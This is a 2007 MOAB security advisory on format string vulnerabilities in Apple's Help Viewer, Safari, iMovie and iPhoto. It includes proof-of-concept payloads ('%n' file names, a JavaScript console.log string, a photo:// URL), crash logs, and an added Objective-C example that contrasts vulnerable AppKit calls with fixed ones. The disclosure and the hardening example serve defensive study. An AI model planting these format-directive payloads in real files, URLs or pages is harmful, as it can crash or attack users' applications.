SECURITYVULNS:DOC:15945
Feb 01, 2007 - 12:00 a.m.

MOAB-30-01-2007: Multiple Apple Software Format String Vulnerabilities

2007-02-01 00:00:00
vulners.com

Summary

As MOAB begins to come to a close we have decided that it is time for a montage of some sort. By definition alone we can bring you nothing short of a closely juxtaposed composite of pure pwnage. Lucky for us Apple's AppKit framework and a few Apple Developers are all we need.

Previously we have highlighted format string issues in Apple Installer, Software Update, iChat, and iPhoto. In today's montage we will add Apple Help Viewer, Safari and iMovie to the list. Coincidentally iPhoto will also be making a return visit (à la Jim Jones). Long live Team America, too.

Affected versions

The following versions were used during our testing:
Help Viewer 3.0.0 (144.1)
Safari 2.0.4 (419.3)
iMovie HD 6.0.3 (267.2)
iPhoto 6.0.5 (316)

Proof of concept, exploit or instructions to reproduce

As we have mentioned in past releases, the origins of these problems are related to the following functions from Apple's AppKit framework:

  • NSBeginAlertSheet
  • NSBeginCriticalAlertSheet
  • NSBeginInformationalAlertSheet
  • NSGetAlertPanel
  • NSGetCriticalAlertPanel
  • NSGetInformationalAlertPanel
  • NSReleaseAlertPanel
  • NSRunAlertPanel
  • NSRunCriticalAlertPanel
  • NSRunInformationalAlertPanel
  • NSLog

Multiple developers of Apple-based software, Apple's own developers included, seem to misunderstand how to properly use the above functions. "For the sake of lulz alone a montage must ensue…"

Safari, iMovie and Help Viewer:

joe-schmoes-computer:/tmp js$ touch %n%n%n%n%n%n%n%n%n%n%n.download
joe-schmoes-computer:/tmp js$ touch %n%n%n%n%n%n%n%n%n%n%n.imovieproj
joe-schmoes-computer:/tmp js$ touch %n%n%n%n%n%n%n%n%n%n%n.help
joe-schmoes-computer:/tmp js$ open %n%n%n%n%n%n%n%n%n%n%n.download
joe-schmoes-computer:/tmp js$ open %n%n%n%n%n%n%n%n%n%n%n.imovieproj
joe-schmoes-computer:/tmp js$ open %n%n%n%n%n%n%n%n%n%n%n.help
joe-schmoes-computer:~/Library/Logs/CrashReporter js$ ls
Help Viewer.crash.log Safari.crash.log iMovie HD.crash.log

Safari:

joe-schmoes-computer:/tmp js$ cat test.html
<script>
window.console.log('%n%n%nOh it takes a montage%n%n%n')
</script>

joe-schmoes-computer:/tmp js$ open test.html
joe-schmoes-computer:~/Library/Logs/CrashReporter js$ ls
Safari.crash.log

iPhoto:

joe-schmoes-computer:/tmp js$ open 'photo://%25n%25n%25n%25n%25n%25n'
joe-schmoes-computer:/tmp js$ ls ~/Library/Logs/CrashReporter/
iPhoto.crash.log

Debugging Montage

iPhoto:

Version: 6.0.5 (6.0.5)
Build Version: 2
Project Name: iPhotoProject
Source Version: 3160000

PID: 874
Thread: 0

Exception: EXC_BAD_ACCESS (0x0001)
Codes: KERN_PROTECTION_FAILURE (0x0002) at 0x925da956

Thread 0 Crashed:
0 libSystem.B.dylib 0x9000c0c1 __vfprintf + 4976
1 libSystem.B.dylib 0x90100ea9 snprintf_l + 504
2 com.apple.CoreFoundation 0x908119d5 _CFStringAppendFormatAndArgumentsAux + 4018
3 com.apple.CoreFoundation 0x9081091c _CFStringCreateWithFormatAndArgumentsAux + 122
4 com.apple.Foundation 0x925daa5d -[NSPlaceholderString initWithFormat:locale:arguments:] + 162
5 com.apple.Foundation 0x92678e6c +[NSString localizedStringWithFormat:] + 129
6 com.apple.iPhoto 0x0002ae3a 0x1000 + 171578
7 com.apple.iPhoto 0x0031298f 0x1000 + 3217807

Safari:

Version: 2.0.4 (419.3)
Build Version: 7
Project Name: WebBrowser
Source Version: 4190300

PID: 455
Thread: 0

Exception: EXC_BAD_ACCESS (0x0001)
Codes: KERN_PROTECTION_FAILURE (0x0002) at 0x00000020

Thread 0 Crashed:
0 libobjc.A.dylib 0x90a55380 objc_msgSend + 16
1 com.apple.AppKit 0x93364838 -[NSWindow(Sheets) _positionSheetConstrained:andDisplay:] + 278
2 com.apple.AppKit 0x9336785e -[NSMoveHelper(Sheets) _moveParent:andOpenSheet:] + 424
3 com.apple.AppKit 0x9336759a -[NSWindow(Sheets) _orderFrontRelativeToWindow:] + 168
4 com.apple.AppKit 0x9328f9ec -[NSWindow _reallyDoOrderWindow:relativeTo:findKey:forCounter:force:isModal:] + 2877
5 com.apple.AppKit 0x933389d8 -[NSApplication _orderFrontModalWindow:relativeToWindow:] + 1074
6 com.apple.AppKit 0x9333833a -[NSApplication _commonBeginModalSessionForWindow:relativeToWindow:modalDelegate:didEndSelecto$
7 com.apple.AppKit 0x93364f7d -[NSApplication beginSheet:modalForWindow:modalDelegate:didEndSelector:contextInfo:] + 122
8 com.apple.AppKit 0x9335f3bf _NXDoLocalRunAlertSheet + 922
9 com.apple.AppKit 0x9335f022 NSBeginAlertSheet + 100
10 com.apple.Safari 0x0008300f 0x1000 + 532495

Help Viewer:

Version: 3.0.0 (144.1)
Build Version: 20
Project Name: HelpViewer
Source Version: 1440800

PID: 970
Thread: 0

Exception: EXC_BAD_ACCESS (0x0001)
Codes: KERN_PROTECTION_FAILURE (0x0002) at 0x9a1ab5ac

Thread 0 Crashed:
0 libSystem.B.dylib 0x9000c0c1 __vfprintf + 4976
1 libSystem.B.dylib 0x90100ea9 snprintf_l + 504
2 com.apple.CoreFoundation 0x908119d5 _CFStringAppendFormatAndArgumentsAux + 4018
3 com.apple.CoreFoundation 0x9081091c _CFStringCreateWithFormatAndArgumentsAux + 122
4 com.apple.Foundation 0x925daa5d -[NSPlaceholderString initWithFormat:locale:arguments:] + 162
5 com.apple.Foundation 0x925fc670 -[NSString initWithFormat:arguments:] + 55
6 com.apple.AppKit 0x9336056f -[NSAlert buildAlertStyle:title:message:first:second:third:oldStyle:args:] + 144
7 com.apple.AppKit 0x9335f2e0 _NXDoLocalRunAlertSheet + 699
8 com.apple.AppKit 0x9335f022 NSBeginAlertSheet + 100
9 com.apple.helpui 0x9a1aca64 -[HelpViewController _displayAlertMessage:withInformativeText:] + 165
10 com.apple.helpui 0x9a1ab79e -[HelpViewController webView:unableToImplementPolicyWithError:frame:] + 512

iMovie HD:

Version: 6.0.3 (6.0.3)
Build Version: 14
Project Name: iMovieApp
Source Version: 2670200

PID: 1013
Thread: 0

Exception: EXC_BAD_ACCESS (0x0001)
Codes: KERN_PROTECTION_FAILURE (0x0002) at 0x00000000

Thread 0 Crashed:
0 libSystem.B.dylib 0x9000c0c1 __vfprintf + 4976
1 libSystem.B.dylib 0x90100ea9 snprintf_l + 504
2 com.apple.CoreFoundation 0x908119d5 _CFStringAppendFormatAndArgumentsAux + 4018
3 com.apple.CoreFoundation 0x9081091c _CFStringCreateWithFormatAndArgumentsAux + 122
4 com.apple.Foundation 0x925daa5d -[NSPlaceholderString initWithFormat:locale:arguments:] + 162
5 com.apple.Foundation 0x925fc670 -[NSString initWithFormat:arguments:] + 55
6 com.apple.AppKit 0x9336056f -[NSAlert buildAlertStyle:title:message:first:second:third:oldStyle:args:] + 144
7 com.apple.AppKit 0x934ac77a _NXDoLocalRunAlertPanel + 683
8 com.apple.AppKit 0x93588ad6 NSRunCriticalAlertPanel + 69
9 com.apple.iMovie 0x000f3f3e 0x1000 + 995134
10 com.apple.iMovie 0x000f3fcf 0x1000 + 995279

Safari (debug enabled):

defaults write com.apple.Safari IncludeDebugMenu 1

Version: 2.0.4 (419.3)
Build Version: 7
Project Name: WebBrowser
Source Version: 4190300

PID: 1042
Thread: 0

Exception: EXC_BAD_ACCESS (0x0001)
Codes: KERN_PROTECTION_FAILURE (0x0002) at 0x90a9755c

Thread 0 Crashed:
0 libSystem.B.dylib 0x9000c0c1 __vfprintf + 4976
1 libSystem.B.dylib 0x90100ea9 snprintf_l + 504
2 com.apple.CoreFoundation 0x908119d5 _CFStringAppendFormatAndArgumentsAux + 4018
3 com.apple.CoreFoundation 0x9081091c _CFStringCreateWithFormatAndArgumentsAux + 122
4 com.apple.Foundation 0x92605ab9 NSLogv + 85
5 com.apple.Foundation 0x926433a5 NSLog + 27
6 libobjc.A.dylib 0x90a58c56 objc_msgSendv + 54
7 com.apple.Foundation 0x925f443e -[NSInvocation invoke] + 932
8 com.apple.JavaScriptCore 0x9527deab KJS::Bindings::ObjcInstance::invokeMethod(KJS::ExecState*, KJS::Bindings::MethodList const&, KJS::List const&) + 1047
9 com.apple.JavaScriptCore 0x9527a220 KJS::RuntimeMethodImp::call(KJS::ExecState*, KJS::Object&, KJS::List const&) + 228
10 com.apple.JavaScriptCore 0x9523f77e KJS::Object::call(KJS::ExecState*, KJS::Object&, KJS::List const&) + 158

Notes

Exploitation conditions

All of these functions behave like printf(): the string passed as their format argument is parsed for conversion directives. Due to a bug in CoreFoundation, these issues are currently difficult to exploit for code execution, although under certain conditions it remains possible.
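The same misuse sits behind every trace above. As an added illustration (not code from the advisory or from Apple), a hypothetical document-open failure handler passes an untrusted file name where AppKit expects msgFormat, beside the corrected calls that keep the format constant. The handler and the names reportOpenFailureVulnerable/reportOpenFailureHardened are assumptions for this example.

```objective-c
#import <Cocoa/Cocoa.h>

// Hypothetical handler in a document-based application (illustrative code,
// not from any Apple product). The file name comes from the filesystem or a
// URL, so an attacker chooses it: "%n%n%n%n.download" is a perfectly valid name.

// VULNERABLE: the untrusted text is passed in the msgFormat slot, so the
// printf-style machinery underneath the alert call parses its directives.
// This is the __vfprintf ... NSRun*AlertPanel path seen in the traces above.
static void reportOpenFailureVulnerable(NSString *fileName)
{
    NSString *message =
        [NSString stringWithFormat:@"Could not open %@", fileName];   // fine so far

    NSRunCriticalAlertPanel(@"Open Failed", message, @"OK", nil, nil); // message is the format
    NSLog(message);   // same mistake: message is interpreted as a format string
}

// HARDENED: the format is a literal; untrusted text is only ever an argument.
// Where the SDK marks the parameter as a format string (as it does for NSLog),
// clang's -Wformat-security warns on the non-literal calls above.
static void reportOpenFailureHardened(NSString *fileName, NSWindow *docWindow)
{
    NSString *message =
        [NSString stringWithFormat:@"Could not open %@", fileName];

    // For the *AlertPanel family the varargs follow the otherButton parameter ...
    NSRunCriticalAlertPanel(@"Open Failed", @"%@", @"OK", nil, nil, message);

    // ... for the *AlertSheet family they follow msgFormat, the last named parameter.
    NSBeginAlertSheet(@"Open Failed", @"OK", nil, nil, docWindow,
                      nil, NULL, NULL, NULL, @"%@", message);

    NSLog(@"%@", message);
}
```

The photo:// case on this page is the same bug one layer up: the URL-decoded "%25n" becomes "%n" before the string reaches the format parameter, so decoding input never makes it safe to use as a format.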

Workaround or temporary solution

Seek out Landon Fuller and he shall destroy all that is evil!

All your AlertPanel are belong to us.